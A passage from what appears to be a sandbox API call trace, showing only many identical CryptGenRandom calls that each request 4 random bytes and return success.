CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.567] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.568] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.569] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.570] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 